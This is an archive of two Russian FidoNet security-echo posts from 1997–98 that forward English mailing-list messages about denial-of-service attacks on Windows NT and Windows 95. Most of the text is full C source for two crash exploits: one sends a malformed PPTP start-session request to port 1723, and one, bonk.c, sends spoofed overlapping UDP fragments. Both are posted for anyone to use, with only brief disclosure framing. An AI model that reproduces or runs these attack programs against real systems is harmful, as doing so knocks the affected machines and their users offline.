_ RU.NETHACK (2:5077/15.22) _______________________________________ RU.NETHACK _
From : Ricky Lyte 2:5030/48.58 06 Dec 97 13:10:02
Subj : DOS (Windoze NT RAS PPTP exploit)
________________________________________________________________________________
AN> Кто pаскажет что затип атаки такой Denial of Service ?
Бомбаpдиpовка сеpвеpа-жеpтвы, пока или коньки не отбpосит, или пеpестанет
pеагиpовать на новые соединения.
Hебольшой пpимеp:
Date: Wed, 26 Nov 1997 11:48:13 -0600
From: Kevin Wormington <kworm@SOFNET.COM>
Subject: Potenial DOS in Windows NT RAS PPTP
Hi, this is my first posting so please excuse the style. Please forgive me
if this has been posted before, but I have not seen it. Also, I am unable
to test it with different hotfixes, etc.
I discovered that NT 4.0 w/SP3 and RAS PPTP is vulnerable to a DOS causing
core dump. I have been working with point to point tunnelling protocol and
discovered (by accident) that if you send a pptp start session request with
an invalid packet length in the pptp packet header that it will crash an NT
box.
Here is a very crude code fragment that will exploit this behaviour:
/*
* Sample Windoze NT RAS PPTP exploit
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#define PPTP_MAGIC_COOKIE 0x1a2b3c4d
#define PPTP_CONTROL_HEADER_OFFSET 8
#define PPTP_REQUEST_OFFSET 12
typedef enum {
PPTP_CONTROL_PACKET = 1,
PPTP_MGMT_PACKET} PptpPacketType;
typedef enum {
PPTP_START_SESSION_REQUEST = 1,
PPTP_START_SESSION_REPLY,
PPTP_STOP_SESSION_REQUEST,
PPTP_STOP_SESSION_REPLY,
PPTP_ECHO_REQUEST,
PPTP_ECHO_REPLY,
PPTP_OUT_CALL_REQUEST,
PPTP_OUT_CALL_REPLY,
PPTP_IN_CALL_REQUEST,
PPTP_IN_CALL_REPLY,
PPTP_IN_CALL_CONNECTED,
PPTP_CALL_CLEAR_REQUEST,
PPTP_CALL_DISCONNECT_NOTIFY,
PPTP_WAN_ERROR_NOTIFY,
PPTP_SET_LINK_INFO,
PPTP_NUMBER_OF_CONTROL_MESSAGES} PptpControlMessageType;
typedef struct {
u_short packetLength;
u_short packetType;
u_long magicCookie;} PptpPacketHeader;
typedef struct {
u_short messageType;
u_short reserved;
} PptpControlHeader;
typedef struct {
u_long identNumber;} PptpEchoRequest;
typedef enum {
PPTP_ECHO_OK = 1,
PPTP_ECHO_GENERAL_ERROR} PptpEchoReplyResultCode;
typedef struct {
u_long identNumber;
u_char resultCode;
u_char generalErrorCode;
u_short reserved;} PptpEchoReply;
#define PPTP_FRAME_CAP_ASYNC 0x00000001L
#define PPTP_FRAME_CAP_SYNC 0x00000002L
#define PPTP_BEARER_CAP_ANALOG 0x00000001L
#define PPTP_BEARER_CAP_DIGITAL 0x00000002L
typedef struct {
u_short protocolVersion;
u_char reserved1;
u_char reserved2;
u_long framingCapability;
u_long bearerCapability;
u_short maxChannels;
u_short firmwareRevision;
char hostName[64];
char vendorString[64];} PptpStartSessionRequest;
int pptp_start_session (int);
int main(int argc, char **argv)
{
int pptp_sock, i, s, offset;
u_long src_ip, dst_ip = 0;
struct in_addr addr;
struct sockaddr_in sn;
struct hostent *hp;
struct servent *sp;
fd_set ctl_mask;
char buf[2048];
if((pptp_sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
{
perror("tcp socket");
exit(1);
}
sp = getservbyname("pptp", "tcp"); /* port 1723 */
if (!sp)
{
fprintf(stderr, "pptp: tcp/pptp: unknown service\n");
exit(1);
}
hp = gethostbyname(argv[1]);
if (!hp) { fprintf (stderr, "Address no good.\n"); exit(1); }
memset(&sn, 0, sizeof(sn));
sn.sin_port = sp->s_port;
sn.sin_family = hp->h_addrtype;
if (hp->h_length > (int)sizeof(sn.sin_addr))
{
hp->h_length = sizeof(sn.sin_addr);
}
memcpy(&sn.sin_addr, hp->h_addr, hp->h_length);
if (connect(pptp_sock, (struct sockaddr *)&sn, sizeof(sn)) < 0)
{
perror("pptp: can't connect");
close(s);
exit(1);
}
pptp_start_session(pptp_sock);
fprintf(stderr, "Done\n");
close(pptp_sock);
return (0);
}
int pptp_start_session (int sock)
{
PptpPacketHeader packetheader;
PptpControlHeader controlheader;
PptpStartSessionRequest sessionrequest;
char packet[200];
int offset;
packetheader.packetLength = htons (20); /* whoops, i forgot to change it
*/
packetheader.packetType = htons(PPTP_CONTROL_PACKET);
packetheader.magicCookie = htonl(PPTP_MAGIC_COOKIE);
controlheader.messageType = htons(PPTP_START_SESSION_REQUEST);
controlheader.reserved = 0;
sessionrequest.protocolVersion = htons(1);
sessionrequest.reserved1 = 0;
sessionrequest.reserved2 = 0;
sessionrequest.framingCapability = htonl(PPTP_FRAME_CAP_ASYNC);
sessionrequest.bearerCapability = htonl(PPTP_BEARER_CAP_ANALOG);
sessionrequest.maxChannels = htons(32);
sessionrequest.firmwareRevision = htons(1);
memset(&sessionrequest.hostName, 0, sizeof (sessionrequest.hostName));
sprintf (sessionrequest.hostName, "%s", "mypc.anywhere.com");
memset(&sessionrequest.vendorString, 0, sizeof
(sessionrequest.vendorString));
sprintf (sessionrequest.vendorString, "%s", "Any Vendor");
memset(&packet, 0, sizeof(packet));
memcpy(&packet, &packetheader, sizeof(packetheader));
memcpy(&packet[PPTP_CONTROL_HEADER_OFFSET], &controlheader,
sizeof(controlheader));
memcpy(&packet[PPTP_REQUEST_OFFSET], &sessionrequest,
sizeof(sessionrequest));
send (sock, &packet, 156, 0);
return (0);
}
AN> Или вот еще вопpос : можно ли как-нибудь обойти shadowing
AN> ?
Об этом в следyющей мессаге.
Team Porno-Grafica
--- 1984! * Origin: Welcome to the world of Emotional Degradation! (2:5030/48.58)
_ Hе ходи! Засекурят (2:5077/15.22) ______________________________ RU.SECURITY _
From : Stas Filshtinskiy 2:461/33.47 10 Jan 98 09:57:20
Subj : new DOS attack
________________________________________________________________________________
Приветствую тебя, All!
Вот почитайте ... опять ...
-----Original Message-----
From: Jiva DeVoe [SMTP:jiva@devware.com]
Sent: Thursday, January 08, 1998 7:53 PM
To: ntsecurity@iss.net
Subject: [NTSEC] New DOS exploit for NT and Win95 (CONFIRMED)
TO UNSUBSCRIBE: email "unsubscribe ntsecurity" to majordomo@iss.net
Contact ntsecurity-owner@iss.net for help with any problems!
---------------------------------------------------------------------------
This is just an FYI. I have confirmed and reproduced a new Denial of
Service exploit for Windows NT and Windows95. Under Windows NT this
exploit causes a proverbial BSOD, under Windows95, this causes an
exception in IFSMGR.VXD.
This exploit has been reported to Microsoft!
Details
Without putting out a blueprint of how to cause this. This is a
modified teardrop attack. (NOTE: This DOES affect machines patched
against teardrop) It utilizes UDP packets with altered headers. I have
also provided Microsoft with source code to this exploit.
Temporary Workaround
Any workaround that would have been implemented against teardrop should
work against this issue. By default, the UDP packets used in this
exploit are aimed at very high port numbers. So perhaps by blocking UDP
packets destined for high port numbers, you might be able to prevent
this attack. However, since it can be aimed at any port, a clever user
could get around filters such as this. I'd be happy to talk to anyone
about other alternatives for working around this issue.
Please feel free to repost this to NTBUGTRAQ (I'm not on that list) or
wherever else you choose.
-------------
Jiva DeVoe
MCSE
Devware Systems
jiva@devware.com
И еще
-----Original Message-----
From: Ken Williams [SMTP:jkwilli2@unity.ncsu.edu]
Sent: Friday, January 09, 1998 8:14 AM
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM; ntsecurity@iss.net
Subject: [NTSEC] bonk.c - modified teardrop attack that affects patched
NT and Win95
TO UNSUBSCRIBE: email "unsubscribe ntsecurity" to majordomo@iss.net
Contact ntsecurity-owner@iss.net for help with any problems!
---------------------------------------------------------------------------
here is the forwarded source code for the modified teardrop attack that
*supposedly* affects all patched NT and Win95 boxes.
Ken
/<--------------{ TATTOOMAN -aka- rute }-------------->\
NCSU Computer Science Member of E.H.A.P.
jkwilli2@unity.ncsu.edu http://www.hackers.com/ehap/
UNIX ICQ UIN# 4231260 ehap@hackers.com
FTP Site: ftp://152.7.11.38/pub/personal/tattooman/
WWW 2: http://www4.ncsu.edu/~jkwilli2/
\<---------{ http://152.7.11.38/~tattooman/ }--------->/
---------- Forwarded message ----------
Date: 8 Jan 1998 20:52:46 -0000
From: announce-outgoing@rootshell.com
Cc: recipient list not shown: ;
Subject: [rootshell] Security Bulletin #5
www.rootshell.com
Security Bulletin #5
January 8th, 1998
[ http://www.rootshell.com/ ]
----------------------------------------------------------------------
To unsubscribe from this mailing list send e-mail to majordomo@rootshell.com
with "unsubscribe announce" in the BODY of the message.
Send submissions to info@rootshell.com. Messages sent will not be sent to
other members on this list unless it is featured in a security bulletin.
An archive of this list is available at :
http://www.rootshell.com/mailinglist-archive
----------------------------------------------------------------------
01. bonk.c - Modified teardrop attack.
--------------------------------------
These network DoS attacks sure are trendy now ...
/*
==bendi - 1998==
bonk.c - 5/01/1998
Based On: teardrop.c by route|daemon9 & klepto
Crashes *patched* win95/(NT?) machines.
Basically, we set the frag offset > header length (teardrop
reversed). There are many theories as to why this works,
however i do not have the resources to perform extensive testing.
I make no warranties. Use this code at your own risk.
Rip it if you like, i've had my fun.
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_udp.h>
#include <netinet/protocols.h>
#include <arpa/inet.h>
#define FRG_CONST 0x3
#define PADDING 0x1c
struct udp_pkt
{
struct iphdr ip;
struct udphdr udp;
char data[PADDING];
} pkt;
int udplen=sizeof(struct udphdr),
iplen=sizeof(struct iphdr),
datalen=100,
psize=sizeof(struct udphdr)+sizeof(struct iphdr)+PADDING,
spf_sck; /* Socket */
void usage(void)
{
fprintf(stderr, "Usage: ./bonk <src_addr> <dst_addr> [num]\n");
exit(0);
}
u_long host_to_ip(char *host_name)
{
static u_long ip_bytes;
struct hostent *res;
res = gethostbyname(host_name);
if (res == NULL)
return (0);
memcpy(&ip_bytes, res->h_addr, res->h_length);
return (ip_bytes);
}
void quit(char *reason)
{
perror(reason);
close(spf_sck);
exit(-1);
}
int fondle(int sck, u_long src_addr, u_long dst_addr, int src_prt,
int dst_prt)
{
int bs;
struct sockaddr_in to;
memset(&pkt, 0, psize);
/* Fill in ip header */
pkt.ip.version = 4;
pkt.ip.ihl = 5;
pkt.ip.tot_len = htons(udplen + iplen + PADDING);
pkt.ip.id = htons(0x455);
pkt.ip.ttl = 255;
pkt.ip.protocol = IP_UDP;
pkt.ip.saddr = src_addr;
pkt.ip.daddr = dst_addr;
pkt.ip.frag_off = htons(0x2000); /* more to come */
pkt.udp.source = htons(src_prt); /* udp header */
pkt.udp.dest = htons(dst_prt);
pkt.udp.len = htons(8 + PADDING);
/* send 1st frag */
to.sin_family = AF_INET;
to.sin_port = src_prt;
to.sin_addr.s_addr = dst_addr;
bs = sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to,
sizeof(struct sockaddr));
pkt.ip.frag_off = htons(FRG_CONST + 1); /* shinanigan */
pkt.ip.tot_len = htons(iplen + FRG_CONST);
/* 2nd frag */
bs = sendto(sck, &pkt, iplen + FRG_CONST + 1, 0,
(struct sockaddr *) &to, sizeof(struct sockaddr));
return bs;
}
void main(int argc, char *argv[])
{
u_long src_addr,
dst_addr;
int i,
src_prt=53,
dst_prt=53,
bs = 1,
pkt_count = 10; /* Default amount */
if (argc < 3)
usage();
if (argc == 4)
pkt_count = atoi(argv[3]); /* 10 does the trick */
/* Resolve hostnames */
src_addr = host_to_ip(argv[1]);
if (!src_addr)
quit("bad source host");
dst_addr = host_to_ip(argv[2]);
if (!dst_addr)
quit("bad target host");
spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (!spf_sck)
quit("socket()");
if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, (char *) &bs,
sizeof(bs)) < 0)
quit("IP_HDRINCL");
for (i = 0; i < pkt_count; ++i)
{
fondle(spf_sck, src_addr, dst_addr, src_prt, dst_prt);
usleep(10000);
}
printf("Done.\n");
}
----------------------------------------------------------------------
To unsubscribe from this mailing list send e-mail to majordomo@rootshell.com
with "unsubscribe announce" in the BODY of the message.
Send submissions to info@rootshell.com. Messages sent will not be sent to
other members on this list unless it is featured in a security bulletin.
An archive of this list is available at :
http://www.rootshell.com/mailinglist-archive
----------------------------------------------------------------------
С уважением,
Stas
Sat Jan 10 1998 09:58.
--- GEcho 1.20/Pro * Origin: 4F @ Home ! (2:461/33.47)
